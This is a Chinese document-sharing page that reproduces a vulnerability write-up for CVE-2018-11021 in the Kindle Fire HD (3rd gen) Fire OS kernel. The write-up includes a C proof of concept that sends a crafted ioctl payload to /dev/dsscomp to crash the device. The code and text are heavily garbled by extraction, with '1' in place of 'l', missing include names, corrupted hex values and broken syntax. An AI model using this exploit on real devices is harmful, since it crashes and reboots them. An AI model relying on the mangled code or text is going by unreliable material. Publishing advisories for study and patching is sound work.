《(CVE-2018-11021)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11021)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(3页珍藏版)》请在第一文库网上搜索。
1、(CVE-2018-11021)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)FireOS4.5.5.3内核组件中的内核模块omapdriversvideoomap2dsscompdevice.c允许攻击者通过设备/dev上ioct1的参数注入特制参数/dsscomp与命令1118064517并导致内核崩溃。要探索此漏洞,必须打开设备文件/dev/dsscomp,并使用命令I118064517和精心设计的有效负载作为第三个参数在此设备文件上调用ioct1系统调用。二、漏洞影响FireOS4.5.5.3
2、三、复现过程poc/* ThisispocofKind1eFireHD3rd* Abugintheioct1interfaceofdevicefi1edevdsscompcausesthesystemcrashviaIOCT11118064517.* Re1atedbuggystructnameisdsscomp_setup_dispc_data.* ThisPocshou1drunwithpermissiontodoioct1ondevdsscomp.*/#inc1ude#inc1udettinc1ude#inc1udeconststaticchar*driver=,devdsscomp;s
3、taticcommand=1118064517;intmain(intargc,char*argv,char*env)unsignedintpay1oad=0xffffffff,0X00000003j05d200040,079900008j0x8f5928bd,0x78b02422j0X000000004Oxffffffff,0f4c50400,0x007fffff,0x8499f562,0ffff0400,0001b131dj060818210,0x00000007,0ffffffff,0x00000000,0x9da9041c0xcd980400,0x001f03f4,0X00000007
4、,0x2a34003f,0x7c80d8f3j0x63102627,0c73643a8,0xa28f0665,0X00000000,0x689e57b4,0x01ff0008,0x5e7324b1,0ae3b003f,00b174d86,0x00000400,0x2:Iffff37,0ceb367a4j0X00000040,0X00000001,0xec000f9e,0x00000001j0000001ff,0X00000000,000000000,0X0000000f,0x0425c069,0038cc3bej00000000f,000000080,0e5790100,0x5b1bffffj
5、0x0000d355,0x0000c685,0xa0070000,00010ffff,000a0ff00,0X00000001j0ff490700,00832ad03j000000006,000000002,0X00000001081f871c0,0738019cb,0bf47ffff,0X00000040j0X00000001,0x7f190f33,0X00000001,0x8295769b,0x0000003fj0x869f2295,Oxffffffff,0xd673914f,0x05055800,0xed69b7d5,000000000j00107ebbdj0xd214af8d,0xff
6、ff4a93j0x26450008,0x58df0000,0d16db084,003ff30ddj0x00000001,0x209aff3b,0xe7850800,0X00000002,0x30da815cj0x426f5105,0x0de109d7,02c1a65fcj0xfcb3d75f,0X00000000,000000001,08066be5b,0X00000002,0ffffffff,0x5cf232ec,0680d1469j0X00000001j0X00000020,0xffffffff,0X00000400,0xd1d12be8j0X02010200,0x01ffc16f,0xf
7、6e237e6j0x007f0000j0x0Iff08f8,0000f00f9,0bad07695,0x00000000,0xbaff0000,0x24040040j0x00000006j0X00000004,0x00000000,0bc2e9242j0009f5f08,0X00800000,0X00000000,0x00000001,0xff8800ff,0X00000001,000000000j0X000003f4,0x6faa8472j0x00000400,0xec857dd5,0x00000000j0X00000040,0ffffffff,03f004874,0x0000b77a,0e
8、c9acb95j0facc0001j0xffff0001j00080ffffj0x3600ff03,0X00000001,08fff7d7f,06b87075a,0x00000000,0x41414141j041414141j0x41414141j0x41414141,0X00100Iff,000000000j0X00000001,0xff1f0512j0x00000001,0x51e32167,0xc18c55ccj0x00000000,Oxffffffff,0xb4aaf12b86edfdbdj0x00000010,0x0000003f,0xabff7b00j0xffff9ea3j0b28
9、e0040,0000fffff,0x458603f4,0ffff007f,0a9030f02j000000001j0x002Cffff,0x9e00cdffj0x00000004j0x41414141,0x41414141,041414141,0x41414141;intfd=0;fd=OPen(driver,0_RDWR);if(fddata1oca1tmp1og);return-1;printf(Tryopen%swithcommand0x%.n,driver,command);printf(Systemwi11crashandreboot.n);if(ioct1(fd,command,pay1oad)data1oca1tmp1og);return-1;c1ose(fd);return0;)崩溃日志Tobeaddedhere
免费区 
